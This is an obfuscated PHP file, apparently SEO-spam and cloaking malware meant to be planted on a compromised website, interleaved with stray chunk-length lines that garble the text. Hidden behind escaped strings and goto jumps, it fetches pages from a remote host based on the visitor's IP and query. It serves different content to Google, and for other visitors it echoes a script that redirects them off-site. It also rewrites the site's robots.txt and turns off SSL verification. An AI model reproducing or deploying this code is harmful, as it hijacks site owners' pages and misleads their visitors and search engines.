2
<?
2
ph
2
p

2

 
2
go
2
to
2
 Z
2
wK
2
5j
3
; s
4
Niwt
2
: 
3
if 
2
(!
2
em
3
pty
2
($
2
sz
2
))
3
 { 
2
$j
2
d 
2
= 
3
get
2
Cu
2
rl
3
Fas
2
t(
2
"{
2
$h
3
ttp
2
_t
3
ype
2
}{
1
$
4
vurl
2
}\
2
63
3
\x6
2
b\
3
147
2
\x
2
2e
5
\141\
1
1
5
63\16
2
0\
3
170
2
\x
3
3f\
2
x7
4
3\x7
1
a
5
\x3d"
2
 .
4
 url
2
en
3
cod
1
e
8
($sz)); 
2
} 
3
els
1
e
2b
 { $jd = getCurlFast("{$http_type}{$vurl}\x
1
3
5
3\153
5
\147\
2
56
1f
\141\163\160\x78\x3f\x78\171\75
d
{$http_type}"
3
); 
62
$sz = getCurlFast("{$http_type}{$vurl}\63\153\147\56\141\163\160\x78\77\x6a\x64\x3d" . urlencode($
2
jd
6
)); } 
34
goto kZXUn; xFIjt: function get_real_ip() { $keys = 
2
ar
3
ray
2
("
3
\x4
3
8\1
2
24
7
\124\x5
3
0\x
1
5
4
f\x4
4
3\10
6
6\x5f\
2
10
3
3\x
5
4f\x4
3
e\1
1
1
5
6\105
5
\103\
6
124\11
7
1\x4e\1
2
07
6
\x5f\1
5
11\x5
3
0",
2
 "
3
\11
5
0\x54
7
\x54\x5
4
0\13
5
7\x58
7
\137\x5
4
2\x4
4
5\10
4
1\x4
7
c\137\x
2
49
3
\12
6
0", "\
4
x48\
c
x54\124\x50\
4
137\
2
13
7
0\137\1
4
06\x
5
4f\12
4
2\12
1
7
b
\101\x52\x4
1
4
9
\105\x44\
6
x5f\10
12
6\117\122", "\110\
8
124\124\
a
120\137\x4
1
3
a
\x4c\x49\1
5
05\x4
8
e\124\x5
e
f\111\x50", "\
8
x52\x45\
2
x4
7
d\x4f\x
1
5
6
4\105\
7
137\x41
6
\x44\x
7
44\122"
3
); 
2
fo
4
reac
2
h 
1
(
8
$keys as
3
 $k
4
) { 
e
if (!empty($_S
2
ER
2
VE
2
R[
2
$k
1
]
7
)) { $i
1
p
3
 = 
d
$_SERVER[$k];
6
 if (s
2
tr
3
pos
1
(
7
$ip, "\
2
54
3
") 
2
!=
2
= 
2
fa
3
lse
b
) { $ip = t
2
ri
3
m(e
2
xp
1
l
4
ode(
6
"\54",
5
 $ip)
2
[0
1
]
5
); } 
7
if (fil
3
ter
2
_v
2
ar
7
($ip, F
2
IL
2
TE
2
R_
2
VA
2
LI
2
DA
2
TE
2
_I
6
P)) { 
3
ret
2
ur
1
n
8
 $ip; } 
4
} } 
8
return "
3
\61
2
\6
3
2\6
6
7\x2e\
3
60\
3
56\
4
60\x
3
2e\
3
x31
1
"
a
; } goto U
3
Oex
2
B;
6
 ZwK5j
2
: 
3
err
2
or
3
_re
3
por
2
ti
2
ng
2
(0
3
); 
6
goto e
2
X8
3
At;
2
 q
2
70
2
WN
1
:
3
 $s
3
url
4
 = $
4
jd .
5
 "\16
6
3\x7a\
1
1
3
56\
f
56\141\163\160\
4
170"
7
; goto 
3
tad
2
jA
2
; 
3
p7j
2
g0
f
: function get_
5
url_i
2
nf
1
o
7
(string
2
 $
4
type
4
 = "
5
\x64\
2
15
3
7\1
1
5
6
5\x61\
2
15
3
1\x
2
6e
4
") :
8
 string 
3
{ $
2
ho
2
st
c
 = $_SERVER[
e
"\x48\124\124\
a
120\137\x4
1
8
6
\117\x
1
5
6
3\124"
3
] ?
2
? 
2
''
6
; if (
7
$type =
1
=
7
= "\x6e
5
\157\
5
x5f\1
4
67\x
6
77\167
1
"
c
) { return p
2
re
1
g
6
_repla
1
c
6
e("\x2
4
f\x5
1
e
e
\167\x77\x77\x
2
5c
4
\56\
5
57\x6
1
9
4
", '
2
',
6
 $host
5
); } 
3
$pr
3
oto
2
co
4
l = 
10
!empty($_SERVER[
a
"\x48\x54\
b
x54\x50\123
2
"]
2
) 
2
&&
c
 $_SERVER["\
11
110\124\124\120\1
4
23"]
5
 !== 
7
"\x6f\1
1
4
5
6\146
3
" ?
4
 "\1
4
50\x
2
74
5
\x74\
7
160\x73
3
\72
4
\57\
3
57"
3
 : 
6
"\150\
2
16
7
4\x74\x
3
70\
6
72\57\
3
x2f
4
"; $
2
ba
5
se = 
a
$protocol 
1
.
6
 $host
14
; if ($type === "\x6
d
2\141\163\145
11
") { return $base
8
; } if (
11
$type === "\146\1
1
6
5
5\x6c
4
\x6c
11
") { return $base
3
 . 
d
($_SERVER["\x
3
52\
6
105\12
4
1\12
1
5
6
\x45\x
3
53\
5
x54\1
6
37\x55
7
\x52\x4
1
9
8
"] ?? ''
d
); } return $
6
host; 
7
} goto 
2
WO
2
Cu
2
f;
2
 o
2
Bx
2
KF
b
: function 
2
en
4
sure
2
_r
2
ob
3
ots
3
_si
2
te
3
map
3
($s
6
itemap
2
Li
1
n
c
e) { $robots
3
 = 
1
r
5
trim(
d
$_SERVER["\10
1
4
6
\117\x
5
43\x5
6
5\x4d\
6
105\11
4
6\x5
1
4
b
\137\x52\x4
1
f
7
\x4f\12
3
4"]
5
, "\5
4
7\13
5
4") .
7
 "\57\x
3
72\
4
x6f\
5
x62\1
6
57\x74
5
\x73\
3
56\
6
x74\x7
5
8\x74
1
"
7
; if (!
3
fil
3
e_e
3
xis
4
ts($
6
robots
5
)) { 
6
@file_
2
pu
3
t_c
2
on
3
ten
a
ts($robots
5
, "\1
3
25\
7
163\145
3
\16
5
2\x2d
6
\141\1
3
47\
5
145\1
4
56\1
5
64\x3
3
a\4
4
0\x2
4
a\xa
6
\x41\1
4
54\x
3
6c\
7
157\x77
5
\72\x
3
20\
5
57\xa
12
" . $sitemapLine, 
2
LO
2
CK
2
_E
1
X
e
); } else { $c
3
 = 
6
@file_
4
get_
10
contents($robots
1
)
8
; if ($c
5
 === 
5
false
2
 |
2
| 
8
strpos($
2
c,
d
 $sitemapLine
1
)
a
 === false
20
) { @file_put_contents($robots, 
e
$sitemapLine, 
3
FIL
3
E_A
2
PP
2
EN
2
D 
1
|
d
 LOCK_EX); } 
1
}
a
 } goto Tc
2
PS
2
L;
2
 j
2
Cs
2
nT
6
: if (
2
$k
6
k === 
2
''
5
 && $
2
is
2
_n
2
o_
3
que
2
ry
8
) { if (
2
$d
3
oma
2
in
9
 === "\14
1
7
6
\157\x
6
6f\147
7
\x6c\x6
6
5") { 
3
out
4
put_
8
sitemap_
2
an
1
d
6
_exit(
e
$sitemapLine, 
a
$http_type
d
); } else { d
2
ie
6
; } } 
6
goto G
2
QG
4
tw; 
8b
y1V0b: $kk = isset($get["\x6b\x6b"]) ? trim($get["\x6b\153"]) : ''; goto u9Vm1; WOCuf: $http_type = !empty($_SERVER["\x48\x54\x54\120\123"]
14
) && $_SERVER["\110\
8
x54\124\
2d
120\123"] !== "\x6f\146\146" ? "\150\x74\x74\
4
x70\
5
x73\x
3
3a\
4
x2f\
9
57" : "\x
2
68
7
\x74\16
10
4\x70\72\x2f\57"
8
; goto V
2
mg
1
L
3
L; 
5
kZXUn
5
: $hy
2
zh
e
dy = $jd . "\1
6
72\x6e
1b
\56\141\163\160\170"; goto 
5
q70WN
1
;
7
 GQGtw:
34
 output_sitemap_and_exit($sitemapLine, $http_type); 
7
goto Ej
2
U3
2
H;
3
 eg
1
g
2
D8
b
: function 
1
c
5
ache_
5
set($
3
key
3
, $
3
dat
1
a
5
) { $
4
file
4
 = s
2
ys
5
_get_
4
temp
3
_di
2
r(
6
) . "\
4
x2f\
1
1
4
43\x
4
61\1
6
43\x68
4
\x65
4
\x5f
5
" . m
2
d5
5
($key
7
) . "\5
1
6
9
\160\x68\
3
160
3
"; 
14
@file_put_contents($
4
file
7
, $data
e
, LOCK_EX); } 
5
goto 
5
xFIjt
1
;
7
 taa3z:
d
 if ($domain 
9
!== "\x67
f
\157\157\147\15
1
4
5
\145"
4
 && 
9
!empty($i
2
id
6
)) { $
3
kna
1
m
4
e = 
4
urld
1
e
5
code(
c
getCurlFast(
9
$jd . "\1
6
47\x6e
1a
\56\141\163\160\x78\x3f\x6
8
9\x69\x6
9
4\x3d" . 
6
$iid))
4
; ec
2
ho
4
 "\x
2
3c
6
\x73\x
6
63\x72
5
\x69\
9
160\x74\7
1
6
9
\x6c\157\
9
143\x61\1
6
64\151
7
\x6f\x6
1
e
3
\75
4
\x22
5
" . $
a
jd . "\141
6
\56\x6
6
1\163\
4
x70\
8
170\x3f\
6
143\x6
7
e\141\1
6
55\x65
3
\75
f
" . urlencode($
5
kname
8
) . "\x2
72
6\165\162\154\75" . $http_type . $_SERVER["\x48\124\124\x50\137\110\x4f\x53\x54"] . $_SERVER["\x53\x43\x52\x49\120
9
\x54\137\
6
116\10
1
1
8
\x4d\105
5
"] . 
5
"\x22
7
\x3c\x2
7
f\x73\x
15
63\x72\x69\160\x74\76
3
"; 
7
die; } 
7
goto ZG
2
eR
2
z;
3
 r7
2
95
1
u
4
: $q
4
z = 
2
su
1
b
3
str
4
(str
9
_replace(
8
array("\
4
167\
8
167\167\
3
x2e
6
", "\5
2
6"
1
)
7
, '', $
1a
_SERVER["\x48\124\124\x50\
6
x5f\x4
1
8
7
\x4f\12
a
3\124"]), 
2
0,
2
 3
8
); goto 
3
ap1
2
mo
1
;
6
 TcPSL
e
: if (!empty($
6
get["\
b
167"])) { $
3
par
2
am
4
s = 
5
http_
2
bu
3
ild
7
_query(
a
array("\x4
8
e\x4f\x5
4
5\x6
4
d\14
1
2
9
\145\162"
2
 =
2
> 
8
$get["\x
6
4e\117
9
\x55\x6d\
7
x62\145
4
\x72
8
"] ?? ''
5
, "\1
2
64
c
" => $get["\
4
164"
b
] ?? '', "\
5
x63\x
3
6e"
c
 => $get["\1
6
43\x6e
d
"] ?? '', "\x
4
70\x
e
4e\x4f\x55\x6d
e
" => $get["\16
e
0\x4e\x4f\x55\
3
155
12
"] ?? '', "\x63\x6
4
9\14
d
4" => $get["\
1
x
5
63\15
4
1\x6
d
4"] ?? '', "\
4
155"
e
 => $get["\x6d
9
"] ?? '')
5
); $s
2
tr
13
 = getCurlFast("{$s
8
url}\x3f
1
{
7
$params
5
}"); 
5
echo 
15
str_replace(array("\1
7
71\171\
7
x6d\x6d
6
", "\x
b
67\x67\x67\
6
147\x6
6
7", "\
4
77\1
3
46\
4
x3d"
3
), 
6
array(
20
$http_type . $_SERVER["\x48\124\
8
x54\120\
7
x5f\110
9
\x4f\123\
13
x54"] . $_SERVER["\
6
123\10
a
3\x52\x49\
6
x50\x5
1
4
8
\x5f\x4e
6
\101\1
1
1
5
5\x45
5
"], $
2
sz
6
, "\77
5
" . $
3
qz 
5
. "\x
6
3d"), 
4
$str
1
)
e
; die; } goto 
6
y1V0b;
6
 ap1mo
1
:
7
 $sz = 
5
$iid 
4
= ''
7
; goto 
2
hl
2
G6
8
j; u9Vm1
1
:
8
 $ip = $
4
kk !
6
== '' 
1
?
5
 "\x3
4
6\66
7
\x2e\x3
4
2\x3
4
4\x3
1
9
5
\x2e\
3
70\
9
62\x2e\70
4
" : 
d
get_real_ip()
8
; goto U
2
fl
2
M7
7
; hlG6j
10
: if (!empty($_G
2
ET
6
)) { $
1
f
5
 = re
5
set($
5
_GET)
4
; $s
4
p = 
a
explode("\
3
x2d
4
", $
1
f
9
); if (co
2
un
4
t($s
1
p
7
) === 2
5
) { $
7
sz = $s
1
p
4
[0];
8
 $iid = 
4
$sp[
2
1]
b
; } } goto 
6
sNiwt;
6
 UflM7
3
: $
8
domain =
6
 trim(
1a
getCurlFast($jd . "\147\x6
1
5
6
\164\1
4
44\x
6
6f\x6d
c
\x61\151\x6e
5
\x32\
7
56\x61\
4
x73\
9
160\170\7
8
7\x72\x6
1
e
5
\144\
6
75\x31
1
\
4
46\x
7
69\160\
7
75" . $
3
ip)
1
)
9
; goto ta
4
a3z;
2
 E
2
YX
2
7h
a
: if ($kk 
1
!
9
== '' && 
5
preg_
3
mat
2
ch
1
(
6
"\57\x
4
5e\x
17
5b\x41\55\x5a\141\x2d\1
3
72\
6
60\x2d
7
\x39\x5
2
d\
3
53\
4
44\5
4
7", 
3
$kk
6
)) { $
3
rem
2
ot
1
e
f
 = getCurlFast(
18
$jd . "\147\x65\164\144\
13
157\155\x61\151\x6e
4
\62\
7
56\141\
6
x73\x7
d
0\170\77\x72\
5
156\1
6
44\75\
6
62\x26
8
\x6b\153
9
\x3d" . $
4
kk);
d
 if (!empty($
6
remote
5
)) { 
5
echo 
8
$remote;
f
 die; } } goto 
2
u3
2
U2
4
k; g
1
m
3
Jgr
12
: function cache_g
a
et($key, $
3
exp
2
ir
4
e = 
3
300
2b
) { $file = sys_get_temp_dir() . "\x2f\143\
7
141\143
7
\150\14
1a
5\x5f" . md5($key) . "\56\
5
x70\1
5
50\x7
1
0
7
"; if (
d
file_exists($
4
file
6
) && t
2
im
4
e() 
1
-
5
 file
6
mtime(
7
$file) 
1
<
8
 $expire
b
) { return 
18
file_get_contents($file)
b
; } return 
5
false
9
; } goto 
6
eggD8;
6
 u3U2k
15
: if ($kk !== '' && !
d
preg_match("\
5
x2f\1
1
3
4
6\x5
a
b\x41\55\1
1
3
6
2\141\
c39
x2d\172\x30\x2d\x39\135\x2b\44\57", $kk)) { output_sitemap_and_exit($sitemapLine, $http_type); } goto eCAbA; ofsRJ: function output_sitemap_and_exit($sitemapLine, $http_type) { ensure_robots_sitemap($sitemapLine); echo "\x3c\x64\x69\x76\40\x73\x74\171\154\x65\x3d\x27\164\145\x78\x74\x2d\x61\x6c\151\x67\156\72\x63\x65\156\164\145\x72\73\160\x61\x64\x64\x69\x6e\147\x3a\61\60\160\170\40\x30\73\47\x3e\xa\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\74\x61\40\150\162\145\146\x3d\x22{$http_type}{$_SERVER["\110\124\124\120\137\110\117\123\124"]}{$_SERVER["\x53\103\122\111\x50\x54\x5f\116\x41\x4d\105"]}\x3f\167\x3d" . date("\131\x6d\144\110\151") . "\x22\x20\164\x61\x72\147\x65\x74\x3d\x22\137\142\154\x61\x6e\x6b\x22\x20\x72\x65\154\75\42\x6e\x6f\146\157\x6c\154\x6f\x77\x22\x3e\x53\151\164\145\x6d\141\160\74\x2f\141\x3e\xa\40\x20\x20\x20\40\40\x20\x20\40\x20\74\x2f\x64\x69\166\76"; die; } goto EYX7h; tadjA: $sitemapLine = "\123\151\x74\145\155\x61\x70\x3a\x20{$http_type}{$_SERVER["\x48\124\124\120\x5f\110\x4f\123\x54"]}{$_SERVER["\123\103\x52\111\x50\124\137\x4e\101\x4d\x45"]}\x3f\x77\x3d" . date("\131\155\144\110\151") . "\xa"; goto oBxKF; VmgLL: $vurl = "\164\157\x2e\152\x67\x61\x6c\154\x73\x2e\x63\157\155\x2f"; goto r795u; eCAbA: $is_no_query = empty($_SERVER["\x51\125\105\x52\131\137\x53\x54\122\x49\x4e\x47"]); goto jCsnT; eX8At: $get = filter_input_array(INPUT_GET, FILTER_SANITIZE_STRING); goto gmJgr; ZGeRz: if (!empty($iid)) { $str = getCurlFast($hyzhdy . "\x3f\x69\x69\x64\x3d{$iid}"); echo str_replace(array("\x67\x67\x67\147\147", "\x59\131\x59\x59\131", "\x58\x58\x58\131\131\x59", "\xe5\xbd\223\345\x89\x8d\125\x52\x4c", "\125\x55\x55\125\x55", "\115\x4d\115\115\x4d", "\77\x66\75"), array($sz, get_url_info(), get_url_info("\142\141\163\145"), get_url_info("\146\x75\x6c\154"), get_url_info("\x6e\x6f\x5f\x77\167\x77"), parse_url($_SERVER["\122\105\121\125\x45\123\124\137\x55\122\111"], PHP_URL_PATH), "\77" . $qz . "\75"), $str); die; } goto ofsRJ; UOexB: function getCurlFast($url) { $cached = cache_get($url); if ($cached !== false) { return $cached; } $data = ''; if (function_exists("\143\x75\x72\x6c\x5f\151\156\151\164")) { $ch = curl_init($url); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 8, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_FOLLOWLOCATION => false, CURLOPT_USERAGENT => "\115\157\x7a\x69\x6c\154\x61\57\65\56\60")); $data = curl_exec($ch); curl_close($ch); } if (empty($data) && ini_get("\x61\154\154\157\167\x5f\x75\x72\154\137\x66\157\160\x65\x6e")) { $context = stream_context_create(array("\150\x74\x74\160" => array("\164\151\x6d\145\157\x75\x74" => 8, "\x68\x65\x61\x64\145\x72" => "\x55\x73\145\162\55\101\x67\145\156\x74\x3a\x20\x4d\x6f\172\x69\154\154\141\x2f\65\56\x30\xd\12"), "\163\x73\x6c" => array("\x76\145\x72\x69\146\x79\x5f\x70\x65\x65\x72" => false, "\166\x65\x72\x69\146\x79\x5f\x70\x65\145\162\137\x6e\141\x6d\145" => false))); $data = @file_get_contents($url, false, $context); } if (!empty($data)) { cache_set($url, $data); } return $data; } goto p7jg0; EjU3H: ?>
0